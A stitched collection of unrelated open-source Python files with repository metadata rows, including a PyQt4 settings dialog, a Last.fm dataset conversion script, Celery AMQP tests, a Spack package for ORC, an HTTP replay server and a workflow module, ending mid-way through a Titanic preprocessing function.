__author__ = "Jarkko Aalto \n Timo Konu \n Samuli Kärkkäinen \n Samuli Rahkonen \n Miika Raunio"
__versio__ = "1.0"
from os import path
from PyQt4 import QtCore, uic, QtGui
from Dialogs.ImportMeasurementDialog import CoincTiming
from Widgets.MatplotlibTofeHistogramWidget import MatplotlibHistogramWidget
class GlobalSettingsDialog(QtGui.QDialog):
def __init__(self, masses, settings):
'''Constructor for the program
'''
super().__init__()
self.masses = masses
self.settings = settings
self.__added_timings = {} # Placeholder for timings
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.ui = uic.loadUi(path.join("ui_files", "ui_global_settings.ui"), self)
# Connect UI buttons
self.ui.OKButton.clicked.connect(self.__accept_changes)
self.ui.cancelButton.clicked.connect(self.close)
self.ui.loadProjectPathButton.clicked.connect(
self.__change_project_directory)
self.ui.loadEffPathButton.clicked.connect(
self.__change_efficiency_directory)
buttons = self.ui.findChild(QtGui.QButtonGroup, "elementButtons")
buttons.buttonClicked.connect(self.__change_element_color)
self.line_coinc_count.setValidator(QtGui.QIntValidator(0, 1000000))
self.__set_values()
self.exec_()
def __set_values(self):
'''Set settings values to dialog.
'''
self.ui.projectPathLineEdit.setText(self.settings.get_project_directory())
self.ui.lineEdit_eff_directory.setText(
self.settings.get_efficiency_directory())
for button in self.ui.groupBox_3.findChildren(QtGui.QPushButton):
self.__set_button_color(button,
self.settings.get_element_color(button.text()))
label_adc = QtGui.QLabel("ADC")
label_low = QtGui.QLabel("Low")
label_high = QtGui.QLabel("High")
self.ui.grid_timing.addWidget(label_adc, 0, 0)
self.ui.grid_timing.addWidget(label_low, 1, 0)
self.ui.grid_timing.addWidget(label_high, 2, 0)
for i in range(0, 3):
timing = self.settings.get_import_timing(i)
label = QtGui.QLabel("{0}".format(i))
spin_low = self.__create_spinbox(timing[0])
spin_high = self.__create_spinbox(timing[1])
self.__added_timings[i] = CoincTiming(i, spin_low, spin_high)
self.ui.grid_timing.addWidget(label, 0, i + 1)
self.ui.grid_timing.addWidget(spin_low, 1, i + 1)
self.ui.grid_timing.addWidget(spin_high, 2, i + 1)
self.line_coinc_count.setText(str(self.settings.get_import_coinc_count()))
self.__set_cross_sections()
self.check_es_output.setChecked(self.settings.is_es_output_saved())
# ToF-E graph settings
self.ui.check_tofe_invert_x.setChecked(self.settings.get_tofe_invert_x())
self.ui.check_tofe_invert_y.setChecked(self.settings.get_tofe_invert_y())
self.ui.check_tofe_transpose.setChecked(self.settings.get_tofe_transposed())
tofe_bin_mode = self.settings.get_tofe_bin_range_mode()
self.ui.radio_tofe_bin_auto.setChecked(tofe_bin_mode == 0)
self.ui.radio_tofe_bin_manual.setChecked(tofe_bin_mode == 1)
x_range_min, x_range_max = self.settings.get_tofe_bin_range_x()
y_range_min, y_range_max = self.settings.get_tofe_bin_range_y()
self.ui.spin_tofe_bin_x_max.setValue(x_range_max)
self.ui.spin_tofe_bin_x_min.setValue(x_range_min)
self.ui.spin_tofe_bin_y_max.setValue(y_range_max)
self.ui.spin_tofe_bin_y_min.setValue(y_range_min)
self.ui.spin_tofe_compression_x.setValue(
self.settings.get_tofe_compression_x())
self.ui.spin_tofe_compression_y.setValue(
self.settings.get_tofe_compression_y())
self.ui.spin_depth_iterations.setValue(self.settings.get_num_iterations())
dirtyinteger = 0
colors = sorted(MatplotlibHistogramWidget.color_scheme.items())
for key, unused_value in colors:
self.ui.combo_tofe_colors.addItem(key)
if key == self.settings.get_tofe_color():
self.ui.combo_tofe_colors.setCurrentIndex(dirtyinteger)
dirtyinteger += 1
def __create_spinbox(self, default):
spinbox = QtGui.QSpinBox()
spinbox.stepBy(1)
spinbox.setMinimum(-1000)
spinbox.setMaximum(1000)
spinbox.setValue(int(default))
return spinbox
def __accept_changes(self):
'''Accept changed settings and save.
'''
self.settings.set_project_directory(self.ui.projectPathLineEdit.text())
self.settings.set_efficiency_directory(
self.ui.lineEdit_eff_directory.text())
for button in self.ui.groupBox_3.findChildren(QtGui.QPushButton):
self.settings.set_element_color(button.text(), button.color)
for key in self.__added_timings.keys():
coinc_timing = self.__added_timings[key]
self.settings.set_import_timing(key,
coinc_timing.low.value(),
coinc_timing.high.value())
self.settings.set_import_coinc_count(self.line_coinc_count.text())
# Save cross sections
if self.ui.radio_cross_1.isChecked():
flag_cross = 1
elif self.ui.radio_cross_2.isChecked():
flag_cross = 2
elif self.ui.radio_cross_3.isChecked():
flag_cross = 3
self.settings.set_cross_sections(flag_cross)
self.settings.set_es_output_saved(self.check_es_output.isChecked())
# ToF-E graph settings
self.settings.set_tofe_invert_x(self.ui.check_tofe_invert_x.isChecked())
self.settings.set_tofe_invert_y(self.ui.check_tofe_invert_y.isChecked())
self.settings.set_tofe_transposed(self.ui.check_tofe_transpose.isChecked())
self.settings.set_tofe_color(self.ui.combo_tofe_colors.currentText())
if self.ui.radio_tofe_bin_auto.isChecked():
self.settings.set_tofe_bin_range_mode(0)
elif self.ui.radio_tofe_bin_manual.isChecked():
self.settings.set_tofe_bin_range_mode(1)
x_r_min = self.ui.spin_tofe_bin_x_min.value()
x_r_max = self.ui.spin_tofe_bin_x_max.value()
y_r_min = self.ui.spin_tofe_bin_y_min.value()
y_r_max = self.ui.spin_tofe_bin_y_max.value()
if x_r_min > x_r_max: x_r_min = 0
if y_r_min > y_r_max: y_r_min = 0
compression_x = self.ui.spin_tofe_compression_x.value()
compression_y = self.ui.spin_tofe_compression_y.value()
self.settings.set_tofe_bin_range_x(x_r_min, x_r_max)
self.settings.set_tofe_bin_range_y(y_r_min, y_r_max)
self.settings.set_tofe_compression_x(compression_x)
self.settings.set_tofe_compression_y(compression_y)
self.settings.set_num_iterations(self.ui.spin_depth_iterations.value())
# Save config and close
self.settings.save_config()
self.close()
def __change_project_directory(self):
'''Change default project directory.
'''
folder = QtGui.QFileDialog.getExistingDirectory(self,
"Select default project directory",
directory=self.ui.projectPathLineEdit.text())
if folder:
self.ui.projectPathLineEdit.setText(folder)
def __change_efficiency_directory(self):
'''Change efficiency file directory.
'''
folder = QtGui.QFileDialog.getExistingDirectory(self,
"Select efficiency file directory",
directory=self.ui.lineEdit_eff_directory.text())
if folder:
self.ui.lineEdit_eff_directory.setText(folder)
def __change_element_color(self, button):
'''Change color of element button.
Args:
button: QPushButton
'''
dialog = QtGui.QColorDialog(self)
self.color = dialog.getColor(QtGui.QColor(button.color),
self,
"Select Color for Element: {0}".format(
button.text()))
if self.color.isValid():
self.__set_button_color(button, self.color.name())
def __set_button_color(self, button, color_name):
'''Change button text color.
Args:
button: QPushButton
color_name: String representing color.
'''
text_color = "black"
color = QtGui.QColor(color_name)
luminance = 0.2126 * color.red() + 0.7152 * color.green()
luminance += 0.0722 * color.blue()
if luminance < 50:
text_color = "white"
button.color = color.name()
if not button.isEnabled():
return # Do not set color for disabled buttons.
button.setStyleSheet("background-color: {0}; color: {1};".format(
color.name(), text_color))
def __set_cross_sections(self):
'''Set cross sections to UI.
'''
flag = self.settings.get_cross_sections()
self.ui.radio_cross_1.setChecked(flag == 1)
self.ui.radio_cross_2.setChecked(flag == 2)
self.ui.radio_cross_3.setChecked(flag == 3)
|
gpl-2.0
| 4,782,183,714,612,712,000 | 43.533333 | 96 | 0.605913 | false |
sscdotopen/musicwithtaste
|
tools/dataset.py
|
1
|
3138
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed to Sebastian Schelter (ssc[at]apache.org), who licenses this file
# to You under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import urllib, tarfile, math
import hashlib, numpy
import random
# Big thanks to Alex S. for figuring out that piece of code
def mahout_hash(value):
md5_hash = hashlib.md5(value).digest()
hash = numpy.int64(0)
for c in md5_hash[:8]:
hash = hash << 8 | ord(c)
return str(hash)
# we use the log of plays as smoothed rating
def smoothed_rating(times_played):
if (times_played == 0):
rating = 1
else:
rating = int(math.log(times_played) + 1)
if rating > 10:
rating = 10
return str(rating)
if len(sys.argv) != 2:
print 'usage: %s <directory>' % os.path.basename(sys.argv[0])
sys.exit(-1)
directory = sys.argv[1]
# download file
print '[1] Downloading http://mtg.upf.edu/static/datasets/last.fm/lastfm-dataset-360K.tar.gz (543MB)'
urllib.urlretrieve ("http://mtg.upf.edu/static/datasets/last.fm/lastfm-dataset-360K.tar.gz",
directory + "/lastfm-dataset-360K.tar.gz")
## extract play data from tar file
tar = tarfile.open(directory + "/lastfm-dataset-360K.tar.gz", 'r:gz')
print '[2] Extracting lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv (1.5GB)'
tar.extract('lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv', directory)
print '[3] Converting plays to ratings'
artist_names = set()
lines_read = 0
with open(directory + '/lastfm-ratings.csv', 'w') as preferences_file:
with open(directory + '/lastfm-dataset-360K/usersha1-artmbid-artname-plays.tsv', 'r') as plays_file:
for line in plays_file:
lines_read += 1
(user_id, artist_id, artist_name, plays) = line.strip().split('\t')
artist_names.add(artist_name)
rating = smoothed_rating(int(plays))
preferences_file.write(mahout_hash(user_id) + ',' + mahout_hash(artist_name) + ',' + rating + '\n')
if lines_read % 100000 == 0:
print "%d lines read..." % lines_read
print "%d lines read, done" % lines_read
print '[4] Saving artist names'
artist_names = list(artist_names)
artist_names.sort()
with open(directory + '/lastfm-artists.csv', 'w') as artists_file:
for artist_name in artist_names:
artists_file.write(artist_name + '\n')
print '[5] creating a 10% percent sample of the data'
random.seed('xKrot37')
with open(directory + '/lastfm-ratings-sample-10-percent.csv', 'w') as sampled_preferences:
with open(directory + '/lastfm-ratings.csv', 'r') as preferences_file:
for line in preferences_file:
if random.randint(1, 100) <= 10:
sampled_preferences.write(line)
|
apache-2.0
| 6,709,835,080,681,461,000 | 32.752688 | 105 | 0.695347 | false |
blabla1337/skf-flask
|
skf/api/checklist/endpoints/checklist_item_delete.py
|
1
|
1036
|
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist.business import delete_checklist_item
from skf.api.checklist.serializers import message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security import log, val_num, val_float, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist', description='Operations related to checklist items')
@ns.route('/delete/item/<int:id>')
@api.doc(params={'id': 'DB id of the checklist item'})
@api.response(404, 'Validation error', message)
class ChecklistItemDelete(Resource):
@api.expect(authorization)
@api.response(400, 'No results found', message)
def delete(self, id):
"""
Delete a checklist item.
* Privileges required: **delete**
"""
val_num(id)
validate_privilege(self, 'delete')
result = delete_checklist_item(id)
return result, 200, security_headers()
|
agpl-3.0
| -673,249,171,624,648,400 | 37.37037 | 90 | 0.714286 | false |
Tonny-Gu/Project-Habrew
|
HAP-Python/experiment/Hapmgr/hap_main.py
|
1
|
1036
|
from hap_config_editor import hap_config_editor
import hap_config
import time
import threading
HAP_CE = hap_config_editor()
HAP_List = hap_config.HAP_List
# HAP_List HAP_ID HAP_Name login_time
def register(hap_name, hap_type, val_list=[], func_list=[]):
hap_id = "{0:04d}".format((len(HAP_List) + 1))
HAP_List.append([hap_id, hap_name, hap_type, time.time(), val_list, func_list])
HAP_CE.set_var("HAP_List", HAP_List)
print("New HAP registered!Name:" + hap_name + " ID:" + hap_id)
return hap_id
def login(hap_id):
flag = 0
for i in range(0, len(HAP_List)):
if hap_id == HAP_List[i][0]:
print("HAP:" + hap_id + " Logged in.")
flag = 1
HAP_List[i][3] = time.time()
break
if flag == 0:
print("This HAP hasn't registered!")
def auto_save():
HAP_CE.save_config()
timer1 = threading.Timer(60 * 1000, auto_save)
timer1.start()
if __name__=='hap_main':
print('test2')
from hap_lib import *
hap_init()
auto_save()
|
gpl-3.0
| -3,517,986,094,328,181,000 | 25.564103 | 83 | 0.588803 | false |
sivaprakashniet/push_pull
|
p2p/lib/python2.7/site-packages/celery/tests/bin/test_amqp.py
|
1
|
4738
|
from __future__ import absolute_import
from mock import Mock, patch
from celery.bin.amqp import (
AMQPAdmin,
AMQShell,
dump_message,
amqp,
main,
)
from celery.tests.case import AppCase, WhateverIO
class test_AMQShell(AppCase):
def setup(self):
self.fh = WhateverIO()
self.adm = self.create_adm()
self.shell = AMQShell(connect=self.adm.connect, out=self.fh)
def create_adm(self, *args, **kwargs):
return AMQPAdmin(app=self.app, out=self.fh, *args, **kwargs)
def test_queue_declare(self):
self.shell.onecmd('queue.declare foo')
self.assertIn('ok', self.fh.getvalue())
def test_missing_command(self):
self.shell.onecmd('foo foo')
self.assertIn('unknown syntax', self.fh.getvalue())
def RV(self):
raise Exception(self.fh.getvalue())
def test_spec_format_response(self):
spec = self.shell.amqp['exchange.declare']
self.assertEqual(spec.format_response(None), 'ok.')
self.assertEqual(spec.format_response('NO'), 'NO')
def test_missing_namespace(self):
self.shell.onecmd('ns.cmd arg')
self.assertIn('unknown syntax', self.fh.getvalue())
def test_help(self):
self.shell.onecmd('help')
self.assertIn('Example:', self.fh.getvalue())
def test_help_command(self):
self.shell.onecmd('help queue.declare')
self.assertIn('passive:no', self.fh.getvalue())
def test_help_unknown_command(self):
self.shell.onecmd('help foo.baz')
self.assertIn('unknown syntax', self.fh.getvalue())
def test_onecmd_error(self):
self.shell.dispatch = Mock()
self.shell.dispatch.side_effect = MemoryError()
self.shell.say = Mock()
self.assertFalse(self.shell.needs_reconnect)
self.shell.onecmd('hello')
self.assertTrue(self.shell.say.called)
self.assertTrue(self.shell.needs_reconnect)
def test_exit(self):
with self.assertRaises(SystemExit):
self.shell.onecmd('exit')
self.assertIn("don't leave!", self.fh.getvalue())
def test_note_silent(self):
self.shell.silent = True
self.shell.note('foo bar')
self.assertNotIn('foo bar', self.fh.getvalue())
def test_reconnect(self):
self.shell.onecmd('queue.declare foo')
self.shell.needs_reconnect = True
self.shell.onecmd('queue.delete foo')
def test_completenames(self):
self.assertEqual(
self.shell.completenames('queue.dec'),
['queue.declare'],
)
self.assertEqual(
sorted(self.shell.completenames('declare')),
sorted(['queue.declare', 'exchange.declare']),
)
def test_empty_line(self):
self.shell.emptyline = Mock()
self.shell.default = Mock()
self.shell.onecmd('')
self.shell.emptyline.assert_called_with()
self.shell.onecmd('foo')
self.shell.default.assert_called_with('foo')
def test_respond(self):
self.shell.respond({'foo': 'bar'})
self.assertIn('foo', self.fh.getvalue())
def test_prompt(self):
self.assertTrue(self.shell.prompt)
def test_no_returns(self):
self.shell.onecmd('queue.declare foo')
self.shell.onecmd('exchange.declare bar direct yes')
self.shell.onecmd('queue.bind foo bar baz')
self.shell.onecmd('basic.ack 1')
def test_dump_message(self):
m = Mock()
m.body = 'the quick brown fox'
m.properties = {'a': 1}
m.delivery_info = {'exchange': 'bar'}
self.assertTrue(dump_message(m))
def test_dump_message_no_message(self):
self.assertIn('No messages in queue', dump_message(None))
def test_note(self):
self.adm.silent = True
self.adm.note('FOO')
self.assertNotIn('FOO', self.fh.getvalue())
def test_run(self):
a = self.create_adm('queue.declare foo')
a.run()
self.assertIn('ok', self.fh.getvalue())
def test_run_loop(self):
a = self.create_adm()
a.Shell = Mock()
shell = a.Shell.return_value = Mock()
shell.cmdloop = Mock()
a.run()
shell.cmdloop.assert_called_with()
shell.cmdloop.side_effect = KeyboardInterrupt()
a.run()
self.assertIn('bibi', self.fh.getvalue())
@patch('celery.bin.amqp.amqp')
def test_main(self, Command):
c = Command.return_value = Mock()
main()
c.execute_from_commandline.assert_called_with()
@patch('celery.bin.amqp.AMQPAdmin')
def test_command(self, cls):
x = amqp(app=self.app)
x.run()
self.assertIs(cls.call_args[1]['app'], self.app)
|
bsd-3-clause
| 5,444,333,020,539,348,000 | 29.567742 | 68 | 0.606585 | false |
iulian787/spack
|
var/spack/repos/builtin/packages/orc/package.py
|
2
|
1438
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Orc(CMakePackage):
"""the smallest, fastest columnar storage for Hadoop
workloads."""
homepage = "https://orc.apache.org/"
url = "https://github.com/apache/orc/archive/rel/release-1.6.5.tar.gz"
version('1.6.5', sha256='df5885db8fa2e4435db8d486c6c7fc4e2c565d6197eee27729cf9cbdf36353c0')
depends_on('maven')
depends_on('openssl')
depends_on('zlib@1.2.11:')
depends_on('pcre')
depends_on('protobuf@3.5.1:')
depends_on('zstd@1.4.5:')
depends_on('googletest@1.8.0:')
depends_on('snappy@1.1.7:')
depends_on('lz4@1.7.5:')
patch('thirdparty.patch')
def cmake_args(self):
args = []
args.append('-DCMAKE_CXX_FLAGS=' + self.compiler.cxx_pic_flag)
args.append('-DCMAKE_C_FLAGS=' + self.compiler.cc_pic_flag)
args.append('-DINSTALL_VENDORED_LIBS:BOOL=OFF')
args.append('-DBUILD_LIBHDFSPP:BOOL=OFF')
args.append('-DBUILD_TOOLS:BOOL=OFF')
args.append('-DBUILD_CPP_TESTS:BOOL=OFF')
for x in ('snappy', 'zlib', 'zstd', 'lz4', 'protobuf'):
args.append('-D{0}_HOME={1}'.format(x.upper(),
self.spec[x].prefix))
return args
|
lgpl-2.1
| 1,645,949,391,752,511,000 | 32.44186 | 96 | 0.61822 | false |
mtlynch/ndt-e2e-clientworker
|
client_wrapper/http_server.py
|
1
|
7702
|
# Copyright 2016 Measurement Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines HTTP servers for web-based NDT clients.
Defines various HTTP server classes meant for hosting web-based NDT client
implementations.
"""
import BaseHTTPServer
import datetime
import json
import logging
import SimpleHTTPServer
import threading
import urllib
import pytz
import http_response
logger = logging.getLogger(__name__)
class Error(Exception):
pass
class HttpWaitTimeoutError(Error):
"""Error raised when waiting for an HTTP response timed out."""
def __init__(self, port):
super(HttpWaitTimeoutError, self).__init__(
'Wait timeout exceeded when waiting for a response on local port ' +
str(port))
def create_replay_server_manager(replays, ndt_server_fqdn):
"""Creates a replay server wrapped in a server manager."""
return HttpServerManager(ReplayHTTPServer(replays, ndt_server_fqdn))
class ReplayHTTPServer(BaseHTTPServer.HTTPServer):
"""HTTP server that replays saved HTTP responses.
Attributes:
port: Port on which the server is listening for connections.
replays: A dictionary of HttpResponse instances, keyed by relative URL.
"""
def __init__(self, replays, ndt_server_fqdn):
"""Creates a new ReplayHTTPServer.
Args:
replays: A dictionary of HttpResponse instances, keyed by relative
URL.
ndt_server_fqdn: FQDN of target NDT server.
"""
BaseHTTPServer.HTTPServer.__init__(self, ('', 0), _ReplayRequestHandler)
self._port = self.server_address[1]
self._replays = replays
self._rewrite_mlabns_replays(ndt_server_fqdn)
self._rewrite_localhost_ips()
@property
def port(self):
return self._port
@property
def replays(self):
return self._replays
def _rewrite_mlabns_replays(self, ndt_server_fqdn):
"""Rewrites mlab-ns responses to point to a custom NDT server.
Finds all mlab-ns responses in the replays and replaces the responses
with a synthetic mlab-ns response that points to an NDT server with the
given FQDN.
Args:
ndt_server_fqdn: Target NDT server to use in rewritten mlab-ns
responses.
"""
mlabns_response_data = json.dumps({'city': 'Test_TT',
'url':
'http://%s:7123' % ndt_server_fqdn,
'ip': ['1.2.3.4'],
'fqdn': ndt_server_fqdn,
'site': 'xyz99',
'country': 'US'})
paths = ['/ndt', '/ndt_ssl']
for path in paths:
if path in self._replays:
original_response = self._replays[path]
self._replays[path] = http_response.HttpResponse(
original_response.response_code, original_response.headers,
mlabns_response_data)
def _rewrite_localhost_ips(self):
for path, original_response in self._replays.iteritems():
# Replace all instances of 127.0.0.1 with localhost and the port that
# our parent server is listening on.
rewritten_data = original_response.data.replace(
'127.0.0.1', 'localhost:%d' % self._port)
# Update the Content-Length header since we have changed the
# content.
headers = original_response.headers
headers['content-length'] = len(rewritten_data)
self._replays[path] = http_response.HttpResponse(
original_response.response_code, headers, rewritten_data)
class _ReplayRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Request handler for replaying saved HTTP responses."""
def __init__(self, request, client_address, server):
self._replays = server.replays
self._server_port = server.port
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def do_GET(self):
"""Handle an HTTP GET request.
Serve an HTTP GET request by replaying a stored response. If there is
no matching response, serve a 404 and log a message.
"""
try:
response = self._replays[self.path]
except KeyError:
logger.info('No stored result for %s', self.path)
self.send_error(404, 'File not found')
return
self.send_response(response.response_code)
for header, value in response.headers.iteritems():
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.data)
def log_message(self, format, *args):
# Don't log messages because it creates too much logging noise.
pass
class HttpServerManager(object):
"""A wrapper for HTTP server instances to support asynchronous running.
Wraps HTTP server instances so that callers can easily start the server
asynchronously with assurance that the server has begun serving.
Attributes:
port: The local TCP port on which the child server is listening for
connections.
"""
def __init__(self, http_server):
"""Creates a new HttpServerManager.
Args:
http_server: An HTTP server instance that has a "port" attribute and
a "serve_forever" function.
"""
self._http_server = http_server
self._http_server_thread = None
@property
def port(self):
return self._http_server.port
def start(self):
"""Starts the child HTTP server.
Starts the child HTTP server and blocks until the server begins serving
HTTP requests. After calling start(), the owner of the instance is
responsible for calling close() to release the child server's resources.
"""
self._start_http_server_async()
_wait_for_local_http_response(self._http_server.port)
def _start_http_server_async(self):
"""Starts the child HTTP server in a background thread."""
self._http_server_thread = threading.Thread(
target=self._http_server.serve_forever)
self._http_server_thread.daemon = True
self._http_server_thread.start()
def close(self):
"""Shut down the child HTTP server."""
if self._http_server_thread:
self._http_server.shutdown()
self._http_server_thread.join()
def _wait_for_local_http_response(port):
"""Wait for a local port to begin responding to HTTP requests."""
# Maximum number of seconds to wait for a port to begin responding to
# HTTP requests.
max_wait_seconds = 5
start_time = datetime.datetime.now(tz=pytz.utc)
while (datetime.datetime.now(tz=pytz.utc) - start_time
).total_seconds() < max_wait_seconds:
try:
urllib.urlopen('http://localhost:%d/' % port)
return
except IOError:
pass
raise HttpWaitTimeoutError(port)
|
apache-2.0
| 6,865,305,335,375,241,000 | 34.330275 | 81 | 0.624253 | false |
MicroMagnum/MicroMagnum
|
src/magnum/evolver/cvode.py
|
1
|
1850
|
# Copyright 2012 by the Micromagnum authors.
#
# This file is part of MicroMagnum.
#
# MicroMagnum is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MicroMagnum is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MicroMagnum. If not, see <http://www.gnu.org/licenses/>.
from magnum.mesh import VectorField
from .evolver import Evolver
from magnum.llgDiffEq import *
import magnum.magneto as m
class Cvode(Evolver):
def __init__(self, mesh, eps_abs, eps_rel, step_size, newton_method):
super(Cvode, self).__init__(mesh)
self.eps_abs = eps_abs
self.eps_rel = eps_rel
self.step_size = step_size
self.initialized = False
self.newton_method = newton_method
def initialize(self, state):
self.llg = LlgDiffEq(state)
self.cvode = m.Cvode(self.llg, self.eps_abs, self.eps_rel, self.newton_method)
state.h = self.step_size
self.initialized = True
def evolve(self, state, t_max):
if not self.initialized:
self.initialize(state)
# But: Don't overshoot past t_max!
if state.t + state.h > t_max:
state.h = t_max - state.t # make h_try smaller.
if t_max == 1e100:
t_max = state.t + state.h
t = state.t
# call cvode
self.cvode.evolve(state.t, t_max)
state.t = t_max
state.step += 1
#print(state.substep)
state.substep = 0
state.flush_cache()
state.finish_step()
return state
|
gpl-3.0
| -6,416,352,454,993,770,000 | 28.365079 | 82 | 0.685405 | false |
Sonblind/orchestra
|
orchestra/workflow.py
|
1
|
8139
|
from importlib import import_module
from django.conf import settings
from orchestra.core.errors import InvalidSlugValue
from orchestra.core.errors import SlugUniquenessError
class Workflow():
"""
Workflows represent execution graphs of human and machine steps.
Attributes:
slug (str):
Unique identifier for the workflow.
name (str):
Human-readable name for the workflow.
description (str):
A longer description of the workflow.
steps (dict):
Steps comprising the workflow.
"""
def __init__(self,
**kwargs):
self.slug = kwargs.get('slug')
if len(self.slug) > 200:
raise InvalidSlugValue('Slug value should be less than 200 chars')
self.name = kwargs.get('name')
self.description = kwargs.get('description')
self.steps = {}
def add_step(self, step):
"""
Add `step` to the workflow.
Args:
step (orchestra.workflow.Step):
The step to be added.
Returns:
None
Raises:
orchestra.core.errors.InvalidSlugValue:
Step slug should have fewer than 200 characters.
orchestra.core.errors.SlugUniquenessError:
Step slug has already been used in this workflow.
"""
if len(step.slug) > 200:
raise InvalidSlugValue('Slug value should be less than 200 chars')
if step.slug in self.steps:
raise SlugUniquenessError('Slug value already taken')
self.steps[step.slug] = step
def get_steps(self):
"""
Return all steps for the workflow.
Args:
None
Returns:
steps ([orchestra.workflow.Step]):
List of steps for the workflow.
"""
return self.steps.values()
def get_step_slugs(self):
"""
Return all step slugs for the workflow.
Args:
None
Returns:
slugs ([str]):
List of step slugs for the workflow.
"""
return self.steps.keys()
def get_step(self, slug):
"""
Return the specified step from the workflow.
Args:
slug (str):
The slug of the desired step.
Returns:
step (orchestra.workflow.Step):
The specified step from the workflow.
"""
return self.steps[slug]
def get_human_steps(self):
"""
Return steps from the workflow with a human `worker_type`.
Args:
None
Returns:
steps ([orchestra.workflow.Step]):
Steps from the workflow with a human `worker_type`..
"""
return [step for slug, step in self.steps.items()
if step.worker_type == Step.WorkerType.HUMAN]
def __str__(self):
return self.slug
def __unicode__(self):
return self.slug
class Step():
"""
Steps represent nodes on a workflow execution graph.
Attributes:
slug (str):
Unique identifier for the step.
name (str):
Human-readable name for the step.
description (str):
A longer description of the step.
worker_type (orchestra.workflow.Step.WorkerType):
Indicates whether the policy is for a human or machine.
creation_depends_on ([str]):
Slugs for steps on which this step's creation depends.
submission_depends_on ([str]):
Slugs for steps on which this step's submission depends.
function (function):
Function to execute during step. Should be present only for
machine tasks
required_certifications ([str]):
Slugs for certifications required for a worker to pick up
tasks based on this step.
"""
class WorkerType:
"""Specifies whether step is performed by human or machine"""
HUMAN = 0
MACHINE = 1
def __init__(self,
**kwargs):
self.slug = kwargs.get('slug')
self.name = kwargs.get('name')
self.description = kwargs.get('description')
self.worker_type = kwargs.get('worker_type')
self.creation_depends_on = kwargs.get('creation_depends_on') or []
self.submission_depends_on = kwargs.get('submission_depends_on') or []
self.function = kwargs.get('function')
self.required_certifications = kwargs.get(
'required_certifications') or []
# Example: {'policy': 'previously_completed_steps', 'step': ['design']}
self.assignment_policy = (kwargs.get('assignment_policy')
or get_default_policy(self.worker_type,
'assignment_policy'))
# Example: {'policy': 'sampled_review', 'rate': .25, 'max_reviews': 2}
self.review_policy = (kwargs.get('review_policy')
or get_default_policy(self.worker_type,
'review_policy'))
# Example: {'html_blob': 'http://some_url',
# 'javascript_includes': [url1, url2],
# 'css_includes': [url1, url2]}
self.user_interface = kwargs.get('user_interface') or {}
def __str__(self):
return self.slug
def __unicode__(self):
return self.slug
def get_workflows():
"""
Return all stored workflows.
Args:
None
Returns:
workflows ([orchestra.workflow.Workflow]):
A dict of all workflows keyed by slug.
"""
workflows = {}
for backend_module, variable in settings.ORCHESTRA_PATHS:
backend_module = import_module(backend_module)
workflow = getattr(backend_module, variable)
if workflow.slug in workflows:
raise SlugUniquenessError('Repeated slug value for workflows.')
workflows[workflow.slug] = workflow
return workflows
def get_workflow_by_slug(slug):
"""
Return the workflow specified by `slug`.
Args:
slug (str):
The slug of the desired workflow.
Returns:
workflow (orchestra.workflow.Workflow):
The corresponding workflow object.
"""
return get_workflows()[slug]
def get_workflow_choices():
"""
Return workflow data formatted as `choices` for a model field.
Args:
None
Returns:
workflow_choices (tuple):
A tuple of tuples containing each workflow slug and
human-readable name.
"""
workflows = get_workflows()
choices = []
for slug, workflow in workflows.items():
choices.append((slug, workflow.name))
return tuple(choices)
def get_step_choices():
"""
Return step data formatted as `choices` for a model field.
Args:
None
Returns:
step_choices (tuple):
A tuple of tuples containing each step slug and
human-readable name.
"""
choices = []
for slug, workflow in iter(get_workflows().items()):
for step in workflow.get_steps():
choices.append((step.slug, step.name))
return tuple(choices)
def get_default_policy(worker_type, policy_name):
"""
Return the default value for a specified policy.
Args:
worker_type (orchestra.workflow.Step.WorkerType):
Indicates whether the policy is for a human or machine.
policy_name (str):
The specified policy identifier.
Returns:
default_policy (dict):
A dict containing the default policy for the worker type and
policy name specified.
"""
default_policies = {
'assignment_policy': {'policy': 'anyone_certified'},
'review_policy': {'policy': 'sampled_review',
'rate': 1,
'max_reviews': 1}
}
if worker_type == Step.WorkerType.HUMAN:
return default_policies[policy_name]
else:
return {}
|
apache-2.0
| -6,444,960,388,937,644,000 | 28.067857 | 79 | 0.566654 | false |
Chaparqanatoos/kaggle-knowledge
|
src/main/python/titanic.py
|
1
|
2524
|
import pandas as pd
import numpy as np
def pre_process(df):
df['Gender'] = df['Sex'].map({'female': 0, 'male': 1}).astype(int)
median_ages = np.zeros((2, 3))
for i in range(0, 2):
for j in range(0, 3):
median_ages[i, j] = df[(df['Gender'] == i) & (df['Pclass'] == j + 1)]['Age'].dropna().median()
df['AgeFill'] = df['Age']
for i in range(0, 2):
for j in range(0, 3):
